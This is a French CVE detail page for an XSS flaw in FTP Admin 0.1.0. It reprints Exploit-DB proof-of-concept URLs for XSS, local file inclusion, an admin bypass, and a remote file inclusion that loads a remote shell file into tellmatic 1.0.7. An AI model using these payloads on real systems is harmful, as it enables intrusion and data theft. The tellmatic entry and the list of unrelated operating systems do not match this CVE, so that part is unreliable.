CVE-2007-6232 : Détail

CVE-2007-6232

Cross-site Scripting
A03-Injection
0.21%V3
Network
2007-12-04
17h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Cross-site scripting (XSS) vulnerability in index.php in FTP Admin 0.1.0 allows remote attackers to inject arbitrary web script or HTML via the error parameter in an error page action.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4681

Date de publication : 2007-11-28 23h00 +00:00
Auteur : Omni
EDB Vérifié : Yes

FTP Admin v0.1.0 - MULTIPLE VULNERABILITIES by Omni 1) Infos --------- Date : 2007-11-28 Product : FTP Admin Version : v0.1.0 Vendor : http://sourceforge.net/projects/ftpadmin/ Vendor Status : 2007-11-30 Informed! Description : FTP admin is a web-based user administration tool, for usage in combination with vsftpd. FTP admin requires sudo. Features include modification of users and generation of user passwords. Source : omnipresent - omni E-mail : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]net Team : Playhack.net Security 2) Security Issues ------------------- --- [ XSS ] --- =============================================== I think that is better let you see a PoC instead of explain where is the bug.. If you want to know it just look at the source code. --- [ PoC ] --- =============== http://localhost/ft/index.php?page=error&error=<b>...</b> http://localhost/ft/index.php?page=error&error=<script>alert(1)</script> --- [ Local File Inclusion ] --- ================================ Take a look in index.php, line 49: include("$page.php"); Remembe that you have to log in to made local file inclusion (loggedin = true -> register_global = On) [ Remembe that ] if(!is_file($page . ".php") || (!is_readable($page . ".php"))) { $page = "error"; $error = "Page does not exist or is not readable\n"; } } [ /Remembe that ] --- [ PoC ] --- =============== http://localhost/ft/index.php?page=pass.txt%00&loggedin=true To see pass.txt ... --- [ Admin Bypass ] --- ================================ Today I'm too lazy to explain what's wrong.. so take a look in the source code and watch the var $loggedin !! --- [ PoC ] --- =============== To add a user... http://localhost/ft/index.php?page=add&loggedin=true # milw0rm.com [2007-11-29]
Exploit Database EDB-ID : 4684

Date de publication : 2007-11-30 23h00 +00:00
Auteur : ShAy6oOoN
EDB Vérifié : Yes

~~~~~~~~~~~~~~~~~~~~~~ ~ tellmatic 1.0.7 RFI ~ ~~~~~~~~~~~~~~~~~~~~~~ --------------------- Author : ShAy6oOoN --------------------- Group : PitBull Crew --------------------- Script : tellmatic 1.0.7 --------------------- Download : http://downloads.sourceforge.net/tellmatic/tellmatic-1.0.7.tgz?modtime=1196381865&big_mirror=0 --------------------- Vulnerability Type : Remote File Inclusion --------------------- Method : get --------------------- Register_globals : On --------------------- Exploit URL's : --------------------- http://localhost/tellmatic/include/Classes.inc.php?tm_includepath=http://localhost/shell.txt? http://localhost/tellmatic/include/statistic.inc.php?tm_includepath=http://localhost/shell.txt? http://localhost/tellmatic/include/status.inc.php?tm_includepath=http://localhost/shell.txt? http://localhost/tellmatic/include/status_top_x.inc.php?tm_includepath=http://localhost/shell.txt? http://localhost/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://localhost/shell.txt? Greetings: ---------- PitBull Crew : The_PitBull - iNs - c0ol - Raz0r Thanks To: ---------- str0ke # milw0rm.com [2007-12-01]

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version *

Hp>>Tru64 >> Version *

Ibm>>Aix >> Version *

Linux>>Linux_kernel >> Version *

Santa_cruz_operation>>Sco_unix >> Version any_version

    Sgi>>Irix >> Version any_version

      Sun>>Solaris >> Version *

      Windriver>>Bsdos >> Version any_version

        Ftp>>Admin >> Version 0.1.0

          Références

          https://www.exploit-db.com/exploits/4681
          Tags : exploit, x_refsource_EXPLOIT-DB
          http://secunia.com/advisories/27875
          Tags : third-party-advisory, x_refsource_SECUNIA